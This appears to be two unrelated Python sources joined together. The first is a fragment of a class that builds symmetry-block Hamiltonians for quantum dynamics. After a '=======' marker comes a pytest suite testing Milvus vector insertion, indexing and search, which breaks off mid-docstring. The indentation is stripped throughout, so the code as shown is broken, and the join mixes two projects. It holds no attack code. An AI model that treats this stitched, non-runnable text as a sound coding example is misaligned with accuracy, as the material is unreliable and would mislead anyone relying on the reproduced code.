def __init__(self,blocks,static,dynamic,basis_con,basis_args,dtype,get_proj_kwargs={},save_previous_data=True,compute_all_blocks=False,check_symm=True,check_herm=True,check_pcon=True):
"""
This class is used to split the dynamics of a state up over various symmetry sectors if the initial state does
not obey the symmetry but the hamiltonian does. Moreover we provide a multiprocessing option which allows the
user to split the dynamics up over multiple cores.
---arguments---
* blocks: (required) list/tuple/iterator which contains the blocks the user would like to put into the hamiltonian as dictionaries.
* static: (required) the static operator list which is used to construct the block hamiltonians. follows hamiltonian format.
* dynamic: (required) the dynamic operator list which is used to construct the block hamiltonians. follows hamiltonian format.
* basis_con: (required) the basis constructor used to construct the basis objects which will create the block diagonal hamiltonians.
* basis_args: (required) tuple which gets passed as the first argument for basis_con, contains required arguments.
* check_symm: (optional) flag to check symmetry
* dtype: (required) the data type to construct the hamiltonian with.
* save_previous_data: (optional) when doing the evolution this class has to construct the hamiltonians. this takes
some time and so by setting this to true, the class will keep previously calculated hamiltonians so that next time
it needs to do evolution in that block it doesn't have to calculate it again.
* compute_all_blocks: (optional) flag which tells the class to just compute all hamiltonian blocks at initialization.
This option also sets save_previous_data to True by default.
* check_symm: (optional) flag which tells the function to check the symmetry of the operators for the first hamiltonian constructed.
* check_herm: (optional) same for check_symm but for hermiticity.
* check_pcon: (optional) same for check_symm but for particle conservation.
--- block_ops attributes ---: '_. ' below stands for 'object. '
_.dtype: the numpy data type the block hamiltonians are stored with
_.save_previous_data: flag which tells the user if data is being saved.
_.H_dict: dictionary which contains the block hamiltonians under key str(block) wher block is the block dictionary.
_.P_dict: dictionary which contains the block projectors under the same keys as H_dict.
_.basis_dict: dictionary which contains the basis objects under the same keys ad H_dict.
_.static: list of the static operators used to construct block hamiltonians
_.dynamic: list of dynamic operators use to construct block hamiltonians
"""
self._basis_dict = {}
self._H_dict = {}
self._P_dict = {}
self._V_dict = {}
self._E_dict = {}
self._dtype=dtype
self._save = save_previous_data
self._static = static
self._dynamic = dynamic
self._checks = {"check_symm":check_symm,"check_herm":check_herm,"check_pcon":check_pcon}
self._no_checks = {"check_symm":False,"check_herm":False,"check_pcon":False}
self._checked = False
self._get_proj_kwargs = get_proj_kwargs
blocks = list(blocks)
for block in blocks:
b = basis_con(*basis_args,**block)
if b.Ns > 0:
self._basis_dict[str(block)]=b
if compute_all_blocks:
self._save=True
self.compute_all_blocks()
@property
def dtype(self):
return self._dtype
@property
def save_previous_data(self):
return self._save
@property
def H_dict(self):
return self._H_dict
@property
def P_dict(self):
return self._P_dict
@property
def basis_dict(self):
return self._basis_dict
@property
def static(self):
return list(self._static)
@property
def dynamic(self):
return list(self._dynamic)
def update_blocks(self,blocks,basis_con,basis_args,compute_all_blocks=False):
blocks = list(blocks)
for block in blocks:
if str(block) not in self._basis_dict.keys():
b = basis_con(*basis_args,**block)
if b.Ns > 0:
self._basis_dict[str(block)]=b
if compute_all_blocks:
self.compute_all_blocks()
def compute_all_blocks(self):
for key,b in _iteritems(self._basis_dict):
if self._P_dict.get(key) is None:
p = b.get_proj(self.dtype,**self._get_proj_kwargs)
self._P_dict[key] = p
if self._H_dict.get(key) is None:
if not self._checked:
H = hamiltonian(self._static,self._dynamic,basis=b,dtype=self.dtype,**self._checks)
self._checked=True
else:
H = hamiltonian(self._static,self._dynamic,basis=b,dtype=self.dtype,**self._no_checks)
self._H_dict[key] = H
def diag_ensemble(istate,**diag_ensemble_kwargs):
pass
=======
'''
|
test_add_vectors.py
|
import time
import threading
import logging
import threading
from multiprocessing import Pool, Process
import pytest
from milvus import IndexType, MetricType
from utils import *
dim = 128
index_file_size = 10
collection_id = "test_add"
ADD_TIMEOUT = 60
tag = "1970-01-01"
add_interval_time = 1.5
nb = 6000
class TestAddBase:
"""
******************************************************************
The following cases are used to test `add_vectors` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_add_vector_create_collection(self, connect, collection):
'''
target: test add vector, then create collection again
method: add vector and create collection
expected: status not ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert not status.OK()
def test_add_vector_has_collection(self, connect, collection):
'''
target: test add vector, then check collection existence
method: add vector and call Hascollection
expected: collection exists, status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert assert_has_collection(connect, collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector(self, connect, collection):
'''
target: test add vector after collection deleted
method: delete collection and add vector
expected: status not ok
'''
status = connect.drop_collection(collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after collection_2 deleted
method: delete collection_2 and add vector to collection_1
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.drop_collection(collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_drop_collection(self, connect, collection):
'''
target: test delete collection after add vector
method: add vector and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status = connect.drop_collection(collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_delete_another_collection(self, connect, collection):
'''
target: test delete collection_1 collection after add vector to collection_2
method: add vector and delete collection
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_drop_collection(self, connect, collection):
'''
target: test delete collection after add vector for a while
method: add vector, sleep, and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
connect.flush([collection])
status = connect.drop_collection(collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_delete_another_collection(self, connect, collection):
'''
target: test delete collection_1 collection after add vector to collection_2 for a while
method: add vector , sleep, and delete collection
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status = connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector(self, connect, collection, get_simple_index):
'''
target: test add vector after build index
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector_another(self, connect, collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.create_index(collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index(self, connect, collection, get_simple_index):
'''
target: test build index add after vector
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index_another(self, connect, collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index(self, connect, collection, get_simple_index):
'''
target: test build index add after vector for a while
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index_another(self, connect, collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1 for a while
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector(self, connect, collection):
'''
target: test add vector after search collection
method: search collection and add vector
expected: status ok
'''
vector = gen_single_vector(dim)
status, result = connect.search_vectors(collection, 1, vector)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, result = connect.search_vectors(collection, 1, vector)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector(self, connect, collection):
'''
target: test search vector after add vector
method: add vector and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
connect.flush([collection])
status, result = connect.search_vectors(collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector(self, connect, collection):
'''
target: test search vector after add vector after a while
method: add vector, sleep, and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status, result = connect.search_vectors(collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after search collection_2 a while
method: search collection , sleep, and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
"""
******************************************************************
The following cases are used to test `add_vectors` function
******************************************************************
"""
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids(self, connect, collection):
'''
target: test add vectors in collection, use customize ids
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count
'''
nq = 5; top_k = 1;
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(collection, vectors, ids)
connect.flush([collection])
assert status.OK()
assert len(ids) == nq
status, result = connect.search_vectors(collection, top_k, query_records=vectors)
logging.getLogger().info(result)
assert len(result) == nq
for i in range(nq):
assert result[i][0].id == i
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_ids_no_ids(self, connect, collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use customize ids first, and then use no ids
expected: status not OK
'''
nq = 5; top_k = 1;
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(collection, vectors, ids)
assert status.OK()
status, ids = connect.add_vectors(collection, vectors)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_not_ids_ids(self, connect, collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use not ids first, and then use customize ids
expected: status not OK
'''
nq = 5; top_k = 1;
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status, ids = connect.add_vectors(collection, vectors, ids)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids_length_not_match(self, connect, collection):
'''
target: test add vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
ids = [i for i in range(1, nq)]
with pytest.raises(Exception) as e:
status, ids = connect.add_vectors(collection, vectors, ids)
@pytest.fixture(
scope="function",
params=gen_invalid_vector_ids()
)
def get_vector_id(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vectors_ids_invalid(self, connect, collection, get_vector_id):
'''
target: test add vectors in collection, use customize ids, which are not int64
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
vector_id = get_vector_id
ids = [vector_id for _ in range(nq)]
with pytest.raises(Exception):
connect.add_vectors(collection, vectors, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
assert len(ids) == nq
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, with the partition_tag param
expected: the collection row count equals to nq
'''
nq = 5
vectors = gen_vectors(nq, dim)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert status.OK()
assert len(ids) == nq
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_A(self, connect, collection):
'''
target: test add vectors in collection created before
method: create partition and add vectors in it
expected: the collection row count equals to nq
'''
nq = 5
vectors = gen_vectors(nq, dim)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert status.OK()
assert len(ids) == nq
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_not_existed(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, with the not existed partition_tag param
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_not_existed_A(self, connect, collection):
'''
target: test add vectors in collection created before
method: create partition, add vectors with the not existed partition_tag param
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, dim)
new_tag = "new_tag"
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=new_tag)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_existed(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it repeatly, with the partition_tag param
expected: the collection row count equals to nq
'''
nq = 5
vectors = gen_vectors(nq, dim)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
for i in range(5):
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert status.OK()
assert len(ids) == nq
# @pytest.mark.level(2)
# def test_add_vectors_without_connect(self, dis_connect, collection):
# '''
# target: test add vectors without connection
# method: create collection and add vectors in it, check if added successfully
# expected: raise exception
# '''
# nq = 5
# vectors = gen_vectors(nq, dim)
# with pytest.raises(Exception) as e:
# status, ids = dis_connect.add_vectors(collection, vectors)
def test_add_collection_not_existed(self, connect):
'''
target: test add vectors in collection, which not existed before
method: add vectors collection not existed, check the status
expected: status not ok
'''
nq = 5
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(gen_unique_str("not_exist_collection"), vector)
assert not status.OK()
assert not ids
def test_add_vector_dim_not_matched(self, connect, collection):
'''
target: test add vector, the vector dimension is not equal to the collection dimension
method: the vector dimension is half of the collection dimension, check the status
expected: status not ok
'''
vector = gen_single_vector(int(dim)//2)
status, ids = connect.add_vectors(collection, vector)
assert not status.OK()
def test_add_vectors_dim_not_matched(self, connect, collection):
'''
target: test add vectors, the vector dimension is not equal to the collection dimension
method: the vectors dimension is half of the collection dimension, check the status
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, int(dim)//2)
status, ids = connect.add_vectors(collection, vectors)
assert not status.OK()
def test_add_vector_query_after_sleep(self, connect, collection):
'''
target: test add vectors, and search it after sleep
method: set vector[0][1] as query vectors
expected: status ok and result length is 1
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(collection, vectors)
connect.flush([collection])
status, result = connect.search_vectors(collection, 1, [vectors[0]])
assert status.OK()
assert len(result) == 1
# TODO: enable
# @pytest.mark.repeat(10)
@pytest.mark.timeout(ADD_TIMEOUT)
def _test_add_vector_with_multiprocessing(self, args):
'''
target: test add vectors, with multi processes
method: 10 processed add vectors concurrently
expected: status ok and result length is equal to the length off added vectors
'''
collection = gen_unique_str()
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
milvus.create_collection(param)
vector = gen_single_vector(dim)
process_num = 4
loop_num = 5
processes = []
def add():
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
i = 0
while i < loop_num:
status, ids = milvus.add_vectors(collection, vector)
i = i + 1
# milvus.disconnect()
for i in range(process_num):
p = Process(target=add, args=())
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
time.sleep(2)
status, count = milvus.count_collection(collection)
assert count == process_num * loop_num
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_collection_add_rows_count_multi_threading(self, args):
'''
target: test collection rows_count is correct or not with multi threading
method: create collection and add vectors in it(idmap),
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
collection = gen_unique_str()
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
milvus.create_collection(param)
vectors = gen_vectors(nb, dim)
def add(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
status, result = milvus.add_vectors(collection, records=vectors)
assert status.OK()
status = milvus.flush([collection])
assert status.OK()
for i in range(thread_num):
x = threading.Thread(target=add, args=(i, ))
threads.append(x)
x.start()
for th in threads:
th.join()
status, res = milvus.count_collection(collection)
assert res == thread_num * nb
def test_add_vector_multi_collections(self, connect):
'''
target: test add vectors is correct or not with multiple collections of L2
method: create 50 collections and add vectors into them in turn
expected: status ok
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(20):
collection_name = gen_unique_str('test_add_vector_multi_collections')
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
for j in range(5):
for i in range(20):
status, ids = connect.add_vectors(collection_name=collection_list[i], records=vectors)
assert status.OK()
class TestAddIP:
"""
******************************************************************
The following cases are used to test `add_vectors / index / search / delete` mixed function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_add_vector_create_collection(self, connect, ip_collection):
'''
target: test add vector, then create collection again
method: add vector and create collection
expected: status not ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
param = {'collection_name': ip_collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert not status.OK()
def test_add_vector_has_collection(self, connect, ip_collection):
'''
target: test add vector, then check collection existence
method: add vector and call Hascollection
expected: collection exists, status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert assert_has_collection(connect, ip_collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector(self, connect, ip_collection):
'''
target: test add vector after collection deleted
method: delete collection and add vector
expected: status not ok
'''
status = connect.drop_collection(ip_collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after collection_2 deleted
method: delete collection_2 and add vector to collection_1
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.drop_collection(ip_collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_drop_collection(self, connect, ip_collection):
'''
target: test delete collection after add vector
method: add vector and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status = connect.drop_collection(ip_collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_delete_another_collection(self, connect, ip_collection):
'''
target: test delete collection_1 collection after add vector to collection_2
method: add vector and delete collection
expected: status ok
'''
param = {'collection_name': 'test_add_vector_delete_another_collection',
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status = connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_drop_collection(self, connect, ip_collection):
'''
target: test delete collection after add vector for a while
method: add vector, sleep, and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status = connect.drop_collection(ip_collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_delete_another_collection(self, connect, ip_collection):
'''
target: test delete collection_1 collection after add vector to collection_2 for a while
method: add vector , sleep, and delete collection
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status = connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector(self, connect, ip_collection, get_simple_index):
'''
target: test add vector after build index
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(ip_collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector_another(self, connect, ip_collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.create_index(ip_collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index(self, connect, ip_collection, get_simple_index):
'''
target: test build index add after vector
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status, mode = connect._cmd("mode")
assert status.OK()
status = connect.create_index(ip_collection, index_type, index_param)
if str(mode) == "GPU" and (index_type == IndexType.IVF_PQ):
assert not status.OK()
else:
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index_another(self, connect, ip_collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index(self, connect, ip_collection, get_simple_index):
'''
target: test build index add after vector for a while
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
if index_type == IndexType.IVF_PQ:
pytest.skip("Skip some PQ cases")
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
time.sleep(add_interval_time)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index_another(self, connect, ip_collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1 for a while
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector(self, connect, ip_collection):
'''
target: test add vector after search collection
method: search collection and add vector
expected: status ok
'''
vector = gen_single_vector(dim)
status, result = connect.search_vectors(ip_collection, 1, vector)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, result = connect.search_vectors(ip_collection, 1, vector)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector(self, connect, ip_collection):
'''
target: test search vector after add vector
method: add vector and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
connect.flush([ip_collection])
status, result = connect.search_vectors(ip_collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector(self, connect, ip_collection):
'''
target: test search vector after add vector after a while
method: add vector, sleep, and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
time.sleep(add_interval_time)
status, result = connect.search_vectors(ip_collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector_another(self, connect, ip_collection):
'''
